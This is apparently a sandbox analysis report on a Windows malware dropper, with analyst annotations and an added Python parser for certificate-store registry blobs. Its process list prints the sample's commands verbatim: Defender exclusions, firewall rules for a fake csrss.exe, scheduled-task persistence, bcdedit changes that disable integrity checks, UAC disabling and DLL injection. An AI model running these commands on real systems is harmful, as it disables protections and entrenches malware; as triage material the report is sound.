| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-331 = "E. Europe Daylight Time" | C:\Users\Admin\Pictures\2U5ElIDy3tFD0tPHgA1ebjtp.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-771 = "Montevideo Daylight Time" | C:\Users\Admin\Pictures\2U5ElIDy3tFD0tPHgA1ebjtp.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-242 = "Samoa Standard Time" | C:\Users\Admin\Pictures\2U5ElIDy3tFD0tPHgA1ebjtp.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\dhcpqec.dll,-101 = "Provides DHCP based enforcement for NAP" | C:\Windows\system32\netsh.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-232 = "Hawaiian Standard Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-334 = "Jordan Daylight Time" | C:\Users\Admin\Pictures\2U5ElIDy3tFD0tPHgA1ebjtp.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\napipsec.dll,-4 = "1.0" | C:\Windows\system32\netsh.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-442 = "Arabian Standard Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-82 = "Atlantic Standard Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-541 = "Myanmar Daylight Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-211 = "Pacific Daylight Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-22 = "Cape Verde Standard Time" | C:\Users\Admin\Pictures\2U5ElIDy3tFD0tPHgA1ebjtp.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-362 = "GTB Standard Time" | C:\Users\Admin\Pictures\2U5ElIDy3tFD0tPHgA1ebjtp.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-231 = "Hawaiian Daylight Time" | C:\Users\Admin\Pictures\2U5ElIDy3tFD0tPHgA1ebjtp.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-772 = "Montevideo Standard Time" | C:\Users\Admin\Pictures\2U5ElIDy3tFD0tPHgA1ebjtp.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-392 = "Arab Standard Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-731 = "Fiji Daylight Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-122 = "SA Pacific Standard Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-335 = "Jordan Standard Time" | C:\Users\Admin\Pictures\2U5ElIDy3tFD0tPHgA1ebjtp.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-121 = "SA Pacific Daylight Time" | C:\Users\Admin\Pictures\2U5ElIDy3tFD0tPHgA1ebjtp.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-391 = "Arab Daylight Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-1411 = "Syria Daylight Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-721 = "Central Pacific Daylight Time" | C:\Users\Admin\Pictures\2U5ElIDy3tFD0tPHgA1ebjtp.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-582 = "North Asia East Standard Time" | C:\Users\Admin\Pictures\2U5ElIDy3tFD0tPHgA1ebjtp.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-981 = "Kamchatka Daylight Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-182 = "Mountain Standard Time (Mexico)" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-962 = "Paraguay Standard Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-372 = "Jerusalem Standard Time" | C:\Users\Admin\Pictures\2U5ElIDy3tFD0tPHgA1ebjtp.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-912 = "Mauritius Standard Time" | C:\Users\Admin\Pictures\2U5ElIDy3tFD0tPHgA1ebjtp.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-512 = "Central Asia Standard Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-961 = "Paraguay Daylight Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-441 = "Arabian Daylight Time" | C:\Users\Admin\Pictures\2U5ElIDy3tFD0tPHgA1ebjtp.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-211 = "Pacific Daylight Time" | C:\Users\Admin\Pictures\2U5ElIDy3tFD0tPHgA1ebjtp.exe | N/A |

The MuiCache\...\@tzres.dll,-NNN entries are the string cache Windows fills when a process resolves localized time-zone names; the values themselves are noise. The hive is the useful part: writes land under HKU\.DEFAULT only for a process whose account has no loaded user profile, as LocalSystem does, so windefender.exe, netsh.exe and the Pictures\*.exe stages were running with SYSTEM-level context at this point.
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4 | C:\Windows\rss\csrss.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 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 | C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474\Blob = 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 | C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 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 | C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 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 | C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474 | C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474\Blob = 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 | C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474\Blob = 19000000010000001000000068cb42b035ea773e52ef50ecf50ec5290f0000000100000014000000ce0e658aa3e847e467a147b3049191093d055e6f0b0000000100000034000000420061006c00740069006d006f007200650020004300790062006500720054007200750073007400200052006f006f007400000053000000010000002400000030223020060a2b06010401b13e01640130123010060a2b0601040182373c0101030200c0140000000100000014000000e59d5930824758ccacfa085436867b3ab5044df01d0000000100000010000000918ad43a9475f78bb5243de886d8103c09000000010000000c000000300a06082b06010505070301030000000100000014000000d4de20d05e66fc53fe1a50882c78db2852cae474040000000100000010000000acb694a59c17e0d791529bb19706a6e420000000010000007b030000308203773082025fa0030201020204020000b9300d06092a864886f70d0101050500305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f74301e170d3030303531323138343630305a170d3235303531323233353930305a305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f7430820122300d06092a864886f70d01010105000382010f003082010a0282010100a304bb22ab983d57e826729ab579d429e2e1e89580b1b0e35b8e2b299a64dfa15dedb009056ddb282ece62a262feb488da12eb38eb219dc0412b01527b8877d31c8fc7bab988b56a09e773e81140a7d1ccca628d2de58f0ba650d2a850c328eaf5ab25878a9a961ca967b83f0cd5f7f952132fc21bd57070f08fc012ca06cb9ae1d9ca337a77d6f8ecb9f16844424813d2c0c2a4ae5e60feb6a605fcb4dd075902d459189863f5a563e0900c7d5db2067af385eaebd403ae5e843e5fff15ed69bcf939367275cf77524df3c9902cb93de5c923533f1f2498215c079929bdc63aece76e863a6b97746333bd681831f0788d76bffc9e8e5d2a86a74d90dc271a390203010001a3453043301d0603551d0e04160414e59d5930824758ccacfa085436867b3ab5044df030120603551d130101ff040830060101ff020103300e0603551d0f0101ff040403020106300d06092a864886f70d01010505000382010100850c5d8ee46f51684205a0ddbb4f27258403bdf764fd2dd730e3a41017ebda2929b6793f76f6191323b8100af958a4d46170bd04616a128a17d50abdc5bc307cd6e90c258d86404feccca37e38c637114feddd68318e4cd2b30174eebe755e07481a7f70ff165c84c07985b805fd7fbe6511a30fc002b4f852373904d5a9317a18bfa02af41299f7a34582e33c5ef59d9eb5c89e7c2ec8a49e4e08144b6dfd706d6b1a63bd64e61fb7cef0f29f2ebb1bb7f250887392c2e2e3168d9a3202ab8e18dde91011ee7e35ab90af3e30947ad0333da7650ff5fc8e9e62cf47442c015dbb1db532d247d2382ed0fe81dc326a1eb5ee3cd5fce7811d19c32442ea6339a9 | C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = (blob not reproduced) | C:\Windows\rss\csrss.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4 | C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = (blob not reproduced) | C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe | N/A |
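Both certificate-store rows above share one layout: the registry key name is the certificate's SHA-1 thumbprint, and the Blob value is a run of property records. The Blob for D4DE20D05E66FC53FE1A50882C78DB2852CAE474 decodes to the friendly name "Baltimore CyberTrust Root" with a serverAuth EKU, a genuine public root landing in AuthRoot, which is what happens when a process builds a TLS chain. The entry worth scrutiny is DF3C24F9BFD666761B268073FE06D1CC8D4F82A4 under ROOT, written by both patch.exe and csrss.exe; its blob is not reproduced on this page. The parser below is an added example written for this page, not code from the report or the sample: it walks the records, extracts the friendly name and the thumbprint property, checks that property against the key name and, when the DER record is complete, against the SHA-1 of the DER. The record layout (DWORD property id, DWORD reserved = 1, DWORD length, data) and the property ids are the CERT_*_PROP_ID values from wincrypt.h; REPORT_BLOB_PREFIX is copied from the table above and deliberately cut short inside the DER record; the second sample is constructed and its DER is not a real certificate.

```python
"""Decode a SystemCertificates\\...\\Certificates\\<thumbprint>\\Blob registry value.

Added example, not part of the sandbox report. Each record is: DWORD property
id, DWORD reserved (always 1), DWORD data length, then the data bytes.
"""
import hashlib
import struct
from typing import Dict, List, Tuple

# CERT_*_PROP_ID constants from wincrypt.h for the ids seen in the report blob.
PROP_NAMES = {
    3: "CERT_SHA1_HASH", 4: "CERT_MD5_HASH", 9: "CERT_ENHKEY_USAGE",
    11: "CERT_FRIENDLY_NAME", 15: "CERT_SIGNATURE_HASH", 20: "CERT_KEY_IDENTIFIER",
    25: "CERT_SUBJECT_PUBLIC_KEY_MD5_HASH", 29: "CERT_SUBJECT_NAME_MD5_HASH",
    32: "CERT_CERT", 83: "CERT_ROOT_PROGRAM_CERT_POLICIES",
}

# Prefix of the Blob written for D4DE20D05E66FC53FE1A50882C78DB2852CAE474,
# copied from the table above. The last record (the DER certificate, declared
# length 0x37b) is cut short here on purpose to exercise the truncation path.
REPORT_BLOB_PREFIX = bytes.fromhex("".join([
    "19000000" "01000000" "10000000" "68cb42b035ea773e52ef50ecf50ec529",
    "0f000000" "01000000" "14000000" "ce0e658aa3e847e467a147b3049191093d055e6f",
    "0b000000" "01000000" "34000000"
    "420061006c00740069006d006f007200650020004300790062006500720054007200750073007400200052006f006f0074000000",
    "53000000" "01000000" "24000000" "30223020060a2b06010401b13e01640130123010060a2b0601040182373c0101030200c0",
    "14000000" "01000000" "14000000" "e59d5930824758ccacfa085436867b3ab5044df0",
    "1d000000" "01000000" "10000000" "918ad43a9475f78bb5243de886d8103c",
    "09000000" "01000000" "0c000000" "300a06082b06010505070301",
    "03000000" "01000000" "14000000" "d4de20d05e66fc53fe1a50882c78db2852cae474",
    "04000000" "01000000" "10000000" "acb694a59c17e0d791529bb19706a6e4",
    "20000000" "01000000" "7b030000" "308203773082025f",
]))

# Constructed sample: a complete blob whose DER record is a stand-in byte
# string, not a real certificate, so the DER-vs-thumbprint check runs end to end.
CONSTRUCTED_DER = b"\x30\x03\x02\x01\x01"
CONSTRUCTED_KEY_NAME = hashlib.sha1(CONSTRUCTED_DER).hexdigest().upper()


def build_blob(props: List[Tuple[int, bytes]]) -> bytes:
    """Serialise (property id, data) pairs in the registry Blob layout."""
    return b"".join(struct.pack("<III", pid, 1, len(data)) + data for pid, data in props)


CONSTRUCTED_BLOB = build_blob([
    (11, "Constructed Test Root\x00".encode("utf-16-le")),
    (3, hashlib.sha1(CONSTRUCTED_DER).digest()),
    (32, CONSTRUCTED_DER),
])


def parse_cert_blob(blob: bytes) -> List[Dict[str, object]]:
    """Walk the property records. A final record whose data runs past the end of
    the blob is returned with truncated=True rather than raising."""
    records: List[Dict[str, object]] = []
    off = 0
    while off + 12 <= len(blob):
        prop_id, reserved, length = struct.unpack_from("<III", blob, off)
        if reserved != 1:
            raise ValueError(f"unexpected reserved field {reserved} at offset {off}")
        data = blob[off + 12: off + 12 + length]
        records.append({
            "id": prop_id, "name": PROP_NAMES.get(prop_id, f"PROP_{prop_id}"),
            "declared_len": length, "data": data, "truncated": len(data) < length,
        })
        off += 12 + length
    return records


def summarize(records: List[Dict[str, object]], key_name: str) -> Dict[str, object]:
    """Cross-check the SHA-1 property against the key name and the DER bytes."""
    by_id = {r["id"]: r for r in records}
    sha1_prop = by_id[3]["data"].hex() if 3 in by_id else None
    friendly = by_id[11]["data"].decode("utf-16-le").rstrip("\x00") if 11 in by_id else None
    der = by_id.get(32)
    der_sha1 = hashlib.sha1(der["data"]).hexdigest() if der and not der["truncated"] else None
    return {
        "friendly_name": friendly,
        "sha1_property": sha1_prop,
        "sha1_of_der": der_sha1,
        "key_name_matches_property": sha1_prop is not None and sha1_prop == key_name.lower(),
        "der_matches_property": der_sha1 is not None and der_sha1 == sha1_prop,
    }


def check(blob: bytes, key_name: str) -> Dict[str, object]:
    """Parse and summarise one registry entry (key name = expected thumbprint)."""
    return summarize(parse_cert_blob(blob), key_name)


if __name__ == "__main__":
    print("report prefix:", check(REPORT_BLOB_PREFIX, "D4DE20D05E66FC53FE1A50882C78DB2852CAE474"))
    print("constructed:  ", check(CONSTRUCTED_BLOB, CONSTRUCTED_KEY_NAME))
```

On a live host, export the value (for example with `reg.exe query <key> /v Blob` or `Get-ItemPropertyValue` in PowerShell) and pass the bytes to `check()`. A ROOT entry whose DER hash does not match its key name, or whose friendly name is not a root-program CA, is the one to pull for closer review; the Baltimore entry above passes both checks on its visible prefix.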
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: LoadsDriver
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\u1ls.1.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\u1ls.1.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\u1ls.1.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\u1ls.1.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\u1ls.1.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\u1ls.1.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\u1ls.1.exe | N/A |
Suspicious use of SendNotifyMessage
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\u1ls.1.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\u1ls.1.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\u1ls.1.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\u1ls.1.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\u1ls.1.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\u1ls.1.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\u1ls.1.exe | N/A |
Suspicious use of WriteProcessMemory
System policy modification
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Users\Admin\AppData\Local\Temp\ca70a19b730b569ccdd5a903f7cbb98a0ac40a62a77b3d817b65c0f0c9a37620.exe | N/A |
Uses Task Scheduler COM API
Processes
C:\Users\Admin\AppData\Local\Temp\ca70a19b730b569ccdd5a903f7cbb98a0ac40a62a77b3d817b65c0f0c9a37620.exe
"C:\Users\Admin\AppData\Local\Temp\ca70a19b730b569ccdd5a903f7cbb98a0ac40a62a77b3d817b65c0f0c9a37620.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\ca70a19b730b569ccdd5a903f7cbb98a0ac40a62a77b3d817b65c0f0c9a37620.exe" -Force
C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 2604 -s 836
C:\Users\Admin\Pictures\JvwmkpsShYOZx2FO997TqdmI.exe
"C:\Users\Admin\Pictures\JvwmkpsShYOZx2FO997TqdmI.exe"
C:\Users\Admin\Pictures\JziJRjwTPjmAIVQ7YR4wEkVF.exe
"C:\Users\Admin\Pictures\JziJRjwTPjmAIVQ7YR4wEkVF.exe"
C:\Users\Admin\Pictures\2U5ElIDy3tFD0tPHgA1ebjtp.exe
"C:\Users\Admin\Pictures\2U5ElIDy3tFD0tPHgA1ebjtp.exe"
C:\Users\Admin\Pictures\DgEQpmig2k2u8ahd5cM0IXOL.exe
"C:\Users\Admin\Pictures\DgEQpmig2k2u8ahd5cM0IXOL.exe"
C:\Users\Admin\Pictures\yNIUqrzSFbniO7QgiDNi1e5u.exe
"C:\Users\Admin\Pictures\yNIUqrzSFbniO7QgiDNi1e5u.exe"
C:\Users\Admin\AppData\Local\Temp\u1ls.0.exe
"C:\Users\Admin\AppData\Local\Temp\u1ls.0.exe"
C:\Windows\system32\makecab.exe
"C:\Windows\system32\makecab.exe" C:\Windows\Logs\CBS\CbsPersist_20240508235243.log C:\Windows\Logs\CBS\CbsPersist_20240508235243.cab
C:\Users\Admin\AppData\Local\Temp\u1ls.1.exe
"C:\Users\Admin\AppData\Local\Temp\u1ls.1.exe"
C:\Users\Admin\Pictures\2U5ElIDy3tFD0tPHgA1ebjtp.exe
"C:\Users\Admin\Pictures\2U5ElIDy3tFD0tPHgA1ebjtp.exe"
C:\Windows\system32\cmd.exe
C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
C:\Users\Admin\Pictures\JziJRjwTPjmAIVQ7YR4wEkVF.exe
"C:\Users\Admin\Pictures\JziJRjwTPjmAIVQ7YR4wEkVF.exe"
C:\Users\Admin\Pictures\yNIUqrzSFbniO7QgiDNi1e5u.exe
"C:\Users\Admin\Pictures\yNIUqrzSFbniO7QgiDNi1e5u.exe"
C:\Users\Admin\Pictures\DgEQpmig2k2u8ahd5cM0IXOL.exe
"C:\Users\Admin\Pictures\DgEQpmig2k2u8ahd5cM0IXOL.exe"
C:\Windows\rss\csrss.exe
C:\Windows\rss\csrss.exe
C:\Windows\system32\cmd.exe
C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
C:\Windows\system32\cmd.exe
C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
C:\Windows\system32\cmd.exe
C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
"C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe" /eieci=11A12794-499E-4FA0-A281-A9A9AA8B2685 /eipi=5488CB36-BE62-4606-B07B-2EE938868BD1
C:\Windows\system32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
C:\Windows\system32\schtasks.exe
schtasks /delete /tn ScheduledUpdate /f
C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
"C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -create {71A3C7FC-F751-4982-AEC1-E958357E6813} -d "Windows Fast Mode" -application OSLOADER
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} device partition=C:
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} osdevice partition=C:
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} systemroot \Windows
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} path \Windows\system32\osloader.exe
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} kernel ntkrnlmp.exe
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} recoveryenabled 0
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nx OptIn
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nointegritychecks 1
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} inherit {bootloadersettings}
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -displayorder {71A3C7FC-F751-4982-AEC1-E958357E6813} -addlast
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -timeout 0
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -default {71A3C7FC-F751-4982-AEC1-E958357E6813}
C:\Windows\system32\bcdedit.exe
C:\Windows\Sysnative\bcdedit.exe /v
C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe
C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe
C:\Windows\system32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
C:\Windows\windefender.exe
"C:\Windows\windefender.exe"
C:\Windows\SysWOW64\cmd.exe
cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
C:\Windows\SysWOW64\sc.exe
sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
C:\Windows\windefender.exe
C:\Windows\windefender.exe
